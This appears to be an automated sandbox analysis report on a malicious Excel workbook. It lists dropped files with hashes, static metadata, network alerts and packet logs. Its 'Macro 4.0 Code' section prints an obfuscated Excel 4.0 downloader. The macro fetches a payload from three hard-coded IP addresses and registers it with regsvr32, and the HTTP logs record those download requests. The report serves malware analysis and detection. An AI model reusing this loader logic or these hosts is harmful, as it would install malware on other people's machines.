                                                                                                                                                      Preview: L..................F.............-...l..]...l..]... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.<....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R.<....#J........................j.o.n.e.s.....~.1......R.<..Desktop.h.......N...R.<.....Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......210979...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\banUwVSwBY.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Wed Jun 9 06:39:35 2021, atime=Wed Jun 9 06:39:35 2021, length=338451, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2120
                                                                                                                                                      Entropy (8bit):4.749813644460387
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8M2iwgAHKdeNUAJbfve7DxB7aB6myM2iwgAHKdeNUAJbfve7DxB7aB6m:8M2ir0JJSRsB6pM2ir0JJSRsB6
                                                                                                                                                      MD5:03A2F05B7D8CF8DD49856C93243314FD
                                                                                                                                                      SHA1:9BB77A5DED56EFAADBE461A6E0B6B1C137C5E2ED
                                                                                                                                                      SHA-256:0C8FC62A23B834E1CD4FC1407FD51F54B2D09CA194CC06A947750DAEF57308AF
                                                                                                                                                      SHA-512:04D1DF0D560E41E21F9EC152E06BBFF36D0E6FB987D788BB0D8D5096A1CE58A52CA4D5F5E2B9F640619DCB6651011031FCBE1DDDF3A62568504C70A43896CFFB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... ...k..S....:....].......]...*...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.<....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R.<....#J........................j.o.n.e.s.....~.1.....>Q.<..Desktop.h.......N...R.<.....Y..............>.....!v..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2.96...R.< .BANUWV~1.XLS..P......>Q{<.R.<.....V....................8^..b.a.n.U.w.V.S.w.B.Y...x.l.s.x.......U...............-.......T...........>.S......C:\Users\user\Desktop\banUwVSwBY.xlsx..&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.b.a.n.U.w.V.S.w.B.Y...x.l.s.x.........:..,.LB.)...As...`.......X.......210979...........!a..%.H.VZAj...H................!a..%.H.VZAj...H...........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):85
                                                                                                                                                      Entropy (8bit):4.676175494579443
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:oyBVomxWME32P2fiz2P2mxWME32P2v:djM32P6iz2PG32PI
                                                                                                                                                      MD5:1A68CAC18E09A64F9C562750C73E1945
                                                                                                                                                      SHA1:D0135E42FD06C773B58C580966C764EEFF9926D1
                                                                                                                                                      SHA-256:202B7BFACE52B0948B2D7727B2475BF4E8AE9284772855A49838214CD697A555
                                                                                                                                                      SHA-512:5E8E8225BD5BC72BE4D3B84E30385D70FEE4A6A2698724CC477FA4DDF0CDDB1118714F1967480B494BB200E8D75182BABC666978FC5B9B5BAC3F4992FEEB7617
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: Desktop.LNK=0..[misc]..banUwVSwBY.LNK=0..banUwVSwBY.LNK=0..[misc]..banUwVSwBY.LNK=0..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):22
                                                                                                                                                      Entropy (8bit):2.9808259362290785
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                      MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                      SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                      SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                      SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                      C:\Users\user\Desktop\AFC40000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):338451
                                                                                                                                                      Entropy (8bit):7.9798649629458085
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:xcRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZNye+:xcRMmEv2Bc/nvm8IKABfsYOmauFK
                                                                                                                                                      MD5:D999C1637189066DC0D7890456D71B39
                                                                                                                                                      SHA1:4664956F7091107DC2526608DCAC1177187DD510
                                                                                                                                                      SHA-256:03C38B5F37FE8D252AD007E2C2DDFC652CC9E1A52F640E55125140F4D423E0BD
                                                                                                                                                      SHA-512:0F117F2487207335892B0B57FE92B163C46AD5E4B1DE30DD75237FEDDB4189FDC2CD2D73F3F82DB75FA2DD65F4568B4C2C30315D2AC830E843ACDD6506FD2603
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ..N.0...H.C.+j...r`9....&.4V.....=.P.B]T...d.=..3...x5m.....g.1..".[:m../.w.s.!).U.,.b.(.F.{....8.b!j".)%.5..s...L.B....XzUN...a..*Kg.,.(.....T..v.._$....k].*..1."...V...2%hW...:G.@i...mr..+.' ..P.....Lt^U.........D!.,.jy...O.ic7y..R....h..U.{.r....L^...u7.f..U.~..B.[..{.v.....o.q...Q"..p.$.q...Y"..p\$.1....:..#..q.=.....K...A.5...Q...k.@?.{....~.^.....r..}..V.{..#{...w.....D....U[._~..xn.......@[vNz........PK..........!...#.............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\Desktop\~$banUwVSwBY.xls
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):165
                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                      MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                      SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                      SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                      SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      C:\Users\user\Desktop\~$banUwVSwBY.xlsx
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):330
                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                      MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                      SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                      SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                      SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                                      Entropy (8bit):7.979985125691482
                                                                                                                                                      TrID:
                                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                      • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                      File name:banUwVSwBY.xlsx
                                                                                                                                                      File size:341561
                                                                                                                                                      MD5:da5fb469bc9385f16af43843673cadc8
                                                                                                                                                      SHA1:414c25009dd7fad02b87f534779f6863a937aa93
                                                                                                                                                      SHA256:612d8808903469c5840e8697710abe11a2c7e75ccad1e61de969732c42271249
                                                                                                                                                      SHA512:c97f5e199408f49182300e715e279e1530e48f0588f0c2b6a93679097cd5641704ea899ef4842662749e67cf257a28243eff687f85908bafd051969b5e4e392d
                                                                                                                                                      SSDEEP:6144:5qAgRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZN1:5qAgRMmEv2Bc/nvm8IKABfsYOmauFZ
                                                                                                                                                      File Content Preview:PK..........!...`.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74ecd0d2d6d6d0dc

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "banUwVSwBY.xlsx"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:
                                                                                                                                                      Application Name:
                                                                                                                                                      Encrypted Document:
                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      "=FORMULA('2dfgv'!F13&'2dfgv'!E14,I9)"=GOTO('1rtgvrt'!J3)
                                                                                                                                                      "=FORMULA('3fescvaer'!I10&'3fescvaer'!D15,H8)"=GOTO('5fetaert'!H6)
                                                                                                                                                      =,,,,,,,EX,,,,,,,E,,,,"=FORMULA(K10&K11,I10)",,,=D9&D10,,,,,,,=D12"C(""regsvr",,,,,,,,,,,,,,,,,,,,,"32 -s ""&"".""&"".""&""\""&""Post.storg"")","32 -s ""&"".""&"".""&""\""&""Post.storg1"")","32 -s ""&"".""&"".""&""\""&""Post.storg2"")",,,,,,,,,,,,,,,,=GOTO('4scdac'!G3),,,,,,,,,,..\Post.storg,..\Post.storg1,..\Post.storg2,,,,,
                                                                                                                                                      "=FORMULA('3fescvaer'!D8&'5fetaert'!I12,I18)"=GOTO('9rrvrv'!J11)
                                                                                                                                                      "=FORMULA('3fescvaer'!D8&'6vrtgarga'!I14,J18)"=HALT()
                                                                                                                                                      ,,,,"=CONCATENATE(G12,nowik!I9)",,,,,,,,,,"=FORMULA(J5,J11)",,,,,,,,,,=NOW(),,,,.dat,,,,,,,=,=F12&F13,,,,REGIS,,,,"=Kokiser(0,K13&I14&J9&I10,'3fescvaer'!D19,0,0)",=K16&K17&K18"TER(""u""&""R""&""l""&""M""&""o""&""n"",""URL",,,"=""190.14.37.134/""",,Download,,,"=""37.1.196.25/""","=Kokiser(0,K13&I15&J9&I10,'3fescvaer'!E19,0,0)",ToFile,,,"=""51.89.115.124/""",,"=""ht""""A"",""JJC""""&CBB"",""Koki",,,,"=Kokiser(0,K13&I16&J9&I10,'3fescvaer'!F19,0,0)",tp"ser"",,1,9)",,,,,"=""://""",,,,,,,,,,,,,,=GOTO('3fescvaer'!H4),
                                                                                                                                                      "=FORMULA('3fescvaer'!D8&'4scdac'!H8,H13)"=GOTO('8aevgadrg'!I6)
                                                                                                                                                      =GOTO(nowik!H4)
                                                                                                                                                      "=FORMULA('3fescvaer'!I10&'3fescvaer'!F15,I14)"=GOTO('7rvgasdg'!H7)
                                                                                                                                                      "=FORMULA('3fescvaer'!I10&'3fescvaer'!E15,I12)"=GOTO('6vrtgarga'!H7)
                                                                                                                                                      ,='1rtgvrt'!F14=F14&F15,='1rtgvrt'!F15&'1rtgvrt'!F16,='1rtgvrt'!F17&'1rtgvrt'!F18

                                                                                                                                                      Network Behavior

                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                      06/09/21-09:32:10.958517TCP1201ATTACK-RESPONSES 403 Forbidden8049167190.14.37.134192.168.2.22
                                                                                                                                                      06/09/21-09:32:11.440661ICMP399ICMP Destination Unreachable Host Unreachable178.162.223.151192.168.2.22
                                                                                                                                                      06/09/21-09:32:17.040656ICMP399ICMP Destination Unreachable Host Unreachable178.162.223.151192.168.2.22
                                                                                                                                                      06/09/21-09:32:20.092660ICMP399ICMP Destination Unreachable Host Unreachable178.162.223.151192.168.2.22
                                                                                                                                                      06/09/21-09:32:33.760719ICMP399ICMP Destination Unreachable Host Unreachable178.162.223.151192.168.2.22
                                                                                                                                                      06/09/21-09:32:38.100515ICMP399ICMP Destination Unreachable Host Unreachable178.162.223.151192.168.2.22
                                                                                                                                                      06/09/21-09:32:41.948607ICMP399ICMP Destination Unreachable Host Unreachable178.162.223.151192.168.2.22
                                                                                                                                                      06/09/21-09:32:53.335395TCP1201ATTACK-RESPONSES 403 Forbidden804917051.89.115.124192.168.2.22

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jun 9, 2021 09:39:36.021672010 CEST4973580192.168.2.4190.14.37.134
                                                                                                                                                      Jun 9, 2021 09:39:36.231985092 CEST8049735190.14.37.134192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:36.232261896 CEST4973580192.168.2.4190.14.37.134
                                                                                                                                                      Jun 9, 2021 09:39:36.233402014 CEST4973580192.168.2.4190.14.37.134
                                                                                                                                                      Jun 9, 2021 09:39:36.443034887 CEST8049735190.14.37.134192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:37.039876938 CEST8049735190.14.37.134192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:37.040008068 CEST4973580192.168.2.4190.14.37.134
                                                                                                                                                      Jun 9, 2021 09:39:37.051179886 CEST4973780192.168.2.437.1.196.25
                                                                                                                                                      Jun 9, 2021 09:39:40.131628990 CEST4973780192.168.2.437.1.196.25
                                                                                                                                                      Jun 9, 2021 09:39:46.132180929 CEST4973780192.168.2.437.1.196.25
                                                                                                                                                      Jun 9, 2021 09:39:58.177194118 CEST4974580192.168.2.451.89.115.124
                                                                                                                                                      Jun 9, 2021 09:39:58.224869967 CEST804974551.89.115.124192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:58.228557110 CEST4974580192.168.2.451.89.115.124
                                                                                                                                                      Jun 9, 2021 09:39:58.229250908 CEST4974580192.168.2.451.89.115.124
                                                                                                                                                      Jun 9, 2021 09:39:58.275621891 CEST804974551.89.115.124192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:58.427427053 CEST804974551.89.115.124192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:58.427514076 CEST4974580192.168.2.451.89.115.124
                                                                                                                                                      Jun 9, 2021 09:40:42.039133072 CEST8049735190.14.37.134192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:40:42.039875984 CEST4973580192.168.2.4190.14.37.134
                                                                                                                                                      Jun 9, 2021 09:41:03.430947065 CEST804974551.89.115.124192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:41:03.431035995 CEST4974580192.168.2.451.89.115.124
                                                                                                                                                      Jun 9, 2021 09:41:18.172116041 CEST4974580192.168.2.451.89.115.124
                                                                                                                                                      Jun 9, 2021 09:41:18.172630072 CEST4973580192.168.2.4190.14.37.134
                                                                                                                                                      Jun 9, 2021 09:41:18.219366074 CEST804974551.89.115.124192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:41:18.383506060 CEST8049735190.14.37.134192.168.2.4

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jun 9, 2021 09:39:15.583297968 CEST5453153192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:15.625691891 CEST53545318.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:15.677387953 CEST4971453192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:15.723753929 CEST53497148.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:16.738493919 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:16.780836105 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:17.601727009 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:17.645891905 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:18.579010010 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:18.621921062 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:19.445015907 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:19.487179041 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:20.404820919 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:20.448920012 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:21.296180010 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:21.338330030 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:25.574644089 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:25.617300987 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:27.036375999 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:27.080627918 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:28.051018000 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:28.093378067 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:28.158638954 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:28.228566885 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:28.669415951 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:28.745145082 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:29.662398100 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:29.705359936 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:30.731651068 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:30.776664019 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:32.551055908 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:32.595241070 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:32.712630033 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:32.770342112 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:33.935467005 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:33.978018045 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:36.126461983 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:36.170471907 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:36.793051004 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:36.835161924 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:37.403867960 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:37.448498964 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:39.760140896 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:39.803888083 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:40.695657015 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:40.738028049 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:42.367021084 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:42.410222054 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:43.354465961 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:43.398324013 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:39:48.826864958 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:39:48.869738102 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:40:09.269704103 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:40:09.314085960 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:40:31.152020931 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:40:31.209638119 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:40:39.911839962 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:40:39.957901001 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:41:12.893321991 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:41:12.953491926 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                      Jun 9, 2021 09:41:13.959805012 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                      Jun 9, 2021 09:41:14.017297029 CEST53492858.8.8.8192.168.2.4

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • 190.14.37.134
                                                                                                                                                      • 51.89.115.124

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.449735190.14.37.13480C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Jun 9, 2021 09:39:36.233402014 CEST1096OUTGET /44356.4024921296.dat HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                      Host: 190.14.37.134
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Jun 9, 2021 09:39:37.039876938 CEST1107INHTTP/1.1 403 Forbidden
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Wed, 09 Jun 2021 07:39:36 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Content-Length: 548
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      1192.168.2.44974551.89.115.12480C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Jun 9, 2021 09:39:58.229250908 CEST1232OUTGET /44356.4024921296.dat HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                      Host: 51.89.115.124
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Jun 9, 2021 09:39:58.427427053 CEST1232INHTTP/1.1 403 Forbidden
                                                                                                                                                      Server: nginx
